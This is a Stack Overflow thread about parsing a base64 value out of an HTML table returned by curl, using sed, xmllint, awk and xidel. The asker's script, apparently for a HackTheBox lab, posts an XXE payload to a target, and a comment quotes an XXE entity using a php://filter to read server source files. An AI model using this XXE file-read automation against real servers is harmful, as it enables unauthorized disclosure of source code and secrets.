0

I am trying to remove the <td> and </td> from a curl output. The output gives a table view that looks like this:

If DB were ready, would have added:
<table>
  <tr>
    <td>Title:</td>
    <td>dsf</td>
  </tr>
  <tr>
    <td>CWE:</td>
    <td>SSBBTSBTT01FIEJBU0U2NAo=</td>
  </tr>
  <tr>
    <td>Score:</td>
    <td>fdsf</td>
  </tr>
  <tr>
    <td>Reward:</td>
    <td>dsfsdf</td>
  </tr>
</table>

Under the CWE: column is some base64 I want to decode. Here is what I have tried:

#!/bin/bash
cp xxe.txt staging.txt
sed -i "s/PLACEHOLDER/$1/g" staging.txt
DATA=$(cat staging.txt|base64)
curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php > file

# sed: -e expression #1, char 9: unknown option to `s'
cat file | grep "<td>" | sed 's/<td>//g'| sed 's/</td>//g' | sed '1,3d' | sed '2,5d' | tr -d " "

Only, I keep getting

sed: -e expression #1, char 9: unknown option to `s'

on the cat file line.

Update: Using xmllint

#!/bin/bash
cp xxe.txt staging.txt
sed -i "s/PLACEHOLDER/$1/g" staging.txt
DATA=$(cat staging.txt|base64)
curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php > file
xmllint --html --xpath /table/tbody/tr[2]/td[2] $(cat file|sed '1,1d')

Gives me this:

warning: failed to load external entity "<table>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Title:</td>"
warning: failed to load external entity "<td>dsf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>CWE:</td>"
warning: failed to load external entity "<td>BASE 64 WOULD BE HERE</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Score:</td>"
warning: failed to load external entity "<td>fdsf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "<tr>"
warning: failed to load external entity "<td>Reward:</td>"
warning: failed to load external entity "<td>dsfsdf</td>"
warning: failed to load external entity "</tr>"
warning: failed to load external entity "</table>"

Update more:

curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php | sed '1, 1d' | xmllint --html --xpath /table/tbody/tr[2]/td[2] -

XPath set is empty

Jaquarh
  • 6,493
  • 7
  • 34
  • 86
  • 2
    Do you have a compelling reason not to use HTML-aware tools for this? Python ships with several lxml libraries, and modern Linux distros include `xmllint` and similar tools that can be run from the command line. See f/e [xmllint to parse a html file](https://stackoverflow.com/questions/42680061/xmllint-to-parse-a-html-file) – Charles Duffy Aug 12 '21 at 17:21
  • `xmllint --html --xpath /table/tbody/tr[2]/td[2] $(cat file)` isn't working @CharlesDuffy – Jaquarh Aug 12 '21 at 17:30
  • `$(cat file)`? Of course it wouldn't work -- that reads your input file, breaks it into individual command line arguments and puts them on xmllint's command line. Why would you ever want to do that? Use the linked question's answers the way it says to use them, don't make up your own broken thing and then ask why it's broken. – Charles Duffy Aug 12 '21 at 17:31
  • 2
    [Don't Parse XML/HTML With Regex.](https://stackoverflow.com/a/1732454/3776858) I suggest to use an XML/HTML parser (xmlstarlet, xmllint ...). – Cyrus Aug 12 '21 at 17:33
  • while we've got some sample input: `If DB were ready ... `, we don't have the matching expected output; please update the question with the expected output – markp-fuso Aug 12 '21 at 17:33
  • So the "failed to load external entity" errors are completely normal when you do the silly `$(cat file)` thing and put each word from your HTML file into a different command line argument to xmllint. – Charles Duffy Aug 12 '21 at 17:34
  • That is the input and the expected output is the `SSBBTSBTT01FIEJBU0U2NAo=` base64 @markp-fuso – Jaquarh Aug 12 '21 at 17:34
  • Correct usage would be more like `xmllint --html --xpath '/table/tbody/tr[2]/td[2]' - – Charles Duffy Aug 12 '21 at 17:35
  • Oh ya, I wrapped it in quotes `"$(cat file|sed '1,1d')"` and now I just get one warning @CharlesDuffy – Jaquarh Aug 12 '21 at 17:35
  • Stop using `cat`. Nobody ever told you to use cat -- I didn't, the linked duplicate didn't, I don't know how you got the idea in your head. – Charles Duffy Aug 12 '21 at 17:35
  • Piping it to xmllint doesn't work, comes up with the help page lol @CharlesDuffy – Jaquarh Aug 12 '21 at 17:36
  • so explicitly state that in the question, eg: `expected output is:` `SSBBTSBTT01FIEJBU0U2NAo=` – markp-fuso Aug 12 '21 at 17:37
  • If the purpose of the cat call is to remove the first line, you can still do that. `curl ... | sed '1,1d' | xmllint ...` – Charles Duffy Aug 12 '21 at 17:37
  • "Under the CWE: column is some base64 I want to decode." wasn't clear enough? my bad @markp-fuso – Jaquarh Aug 12 '21 at 17:37
  • @Jaquarh, **show us** how you did the pipeline. If you left out the `-`, that would cause an error. Don't make me trust that you did something right and still get an error, **show me** that you're doing it right and still get the error. – Charles Duffy Aug 12 '21 at 17:37
  • `curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php | xmllint --html --xpath /table/tbody/tr[2]/td[2]` @CharlesDuffy – Jaquarh Aug 12 '21 at 17:38
  • @Jaquarh, that's exactly the thing I told you not to do, leaving out the `-` – Charles Duffy Aug 12 '21 at 17:38
  • ahhh I see, now I get `XPath set is empty` =D @CharlesDuffy – Jaquarh Aug 12 '21 at 17:38
  • Great, so now you just need to tune your xpath expression until it's a match for your input document. This is a much narrower/easier problem. :) – Charles Duffy Aug 12 '21 at 17:39
  • First, your question's HTML doesn't have a `tbody`, so why are you putting a `tbody` in your xpath expression? **Web browsers** reformat bad HTML into good HTML, so they'll add elements like that, but you aren't using a web browser here. – Charles Duffy Aug 12 '21 at 17:39
  • Oh ya... im confused why I did that too.... let me try correct this, not really good with xpaths @CharlesDuffy – Jaquarh Aug 12 '21 at 17:40
  • Ahh, I can't figure it out I tried `/table/tr[2]/td[2]` but `XPath set is empty` and yeah, I can't use a web browser because the `staging.txt` holds an XXE I'm trying to automate. I can manually `base64 -d` this but large files take time, to scroll through so I wanted to automate it so I can read source files via the XXE @CharlesDuffy – Jaquarh Aug 12 '21 at 17:45
  • Are you showing us the *whole* HTML file or just a subset? – Charles Duffy Aug 12 '21 at 17:51
  • I ask because `/table/...` assumes that the file starts with `` at the top level; if it puts it inside `
    ...
    `, then you need your XPath to be `/html/body/table` instead.
    – Charles Duffy Aug 12 '21 at 17:51
  • Or, of course, you can use `//table` to an unrooted search. – Charles Duffy Aug 12 '21 at 17:53

3 Answers3

1

Addressing the (original) issue of the sed error:

  • sed 's/</td>//g
  • using / as a delimiter but / is also part of the string to be replaced
  • net result: sed sees an extra / which is a syntax issue
  • either switch to another delimiter that doesn't show up in the data (eg, |) or escape the data (eg, <\/td>)

As for the bigger picture (parsing out the CWE: value) ...

Assuming an HTML-aware tool is not available, there's only one CWE: in the input, and the input is nicely formatted as shown, replace the cat/grep/sed/sed/sed/sed/tr mess and let awk do the work, eg:

awk -F'[<>]' '$3 ~ "CWE:" {printme=1;next} printme {print $3; exit}' file

This generates:

SSBBTSBTT01FIEJBU0U2NAo=
markp-fuso
  • 28,790
  • 4
  • 16
  • 36
  • Using a syntax-unaware tool to "parse" a list of security vulnerabilities is rich. – Charles Duffy Aug 12 '21 at 17:52
  • Thankyou!! My XXE uses `php://` filter to generate base64 encoded source files from the server: `<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=./PLACEHOLDER" >]>` so I can now automatically just scrape the source code! I appreciate it! – Jaquarh Aug 12 '21 at 17:52
  • 1
    @CharlesDuffy uh, yep, and if OP is lucky it'll never bite 'em in the arse :-) – markp-fuso Aug 12 '21 at 17:57
  • its a hackthebox lab, not real world. I just like to automate my tools for the writeups @markp-fuso – Jaquarh Aug 12 '21 at 18:03
  • @Jaquarh, ...point of a lab is to teach you skills you can use in the real world, though. – Charles Duffy Aug 12 '21 at 18:09
  • What is wrong with that, a lot of people have jobs as pentesters @CharlesDuffy – Jaquarh Aug 12 '21 at 18:49
  • @Jaquarh, if you're a competent pentester, you should have a good sense of the extent to which sloppy implementations of parsers and protocols lead to vulnerabilities. If you're so focused on the red-team side of the job that you don't see the skills learnt there as better informing how the blue team should operate... well, I don't know what I can say. – Charles Duffy Aug 12 '21 at 18:54
  • @Jaquarh, so when I say "you can use in the real world", that should be read to mean things you can use _safely_, without inviting means by which your code can be induced to behave incorrectly. – Charles Duffy Aug 12 '21 at 18:58
1

For extracting data from html files (supposing it is well formed XML), you better try this one liner:

curl -X POST --data-urlencode "data=$DATA" -s http://10.10.11.100/tracker_diRbPr00f314.php | xmllint --xpath '//td[text() = "CWE:"]/following-sibling::td/text()' | base64 -d
Pierre François
  • 5,850
  • 1
  • 17
  • 38
1

Please don't use RegEx to parse HTML, but use an HTML parser like instead.

The final bit, extracting and decoding the base64 string:

$ xidel -s file -e '
  //td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))
'
I AM SOME BASE64

Despite not knowing the content of your 'xxe.txt', xidel can probably also do all those steps for you:

$ xidel -s \
  -d 'data={file:read-text("xxe.txt") ! string-to-base64Binary(replace(.,"PLACEHOLDER","<insert-string>"))}' \
  "http://10.10.11.100/tracker_diRbPr00f314.php" \
  -e '//td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))'

or

$ xidel -se '
  x:request({
    "post":"data="||file:read-text("xxe.txt") ! string-to-base64Binary(replace(.,"PLACEHOLDER","<insert-string>")),
    "url":"http://10.10.11.100/tracker_diRbPr00f314.php"
  })/doc//td[text()="CWE:"]/binary-to-string(base64Binary(following-sibling::td))
'
Reino
  • 3,203
  • 1
  • 13
  • 21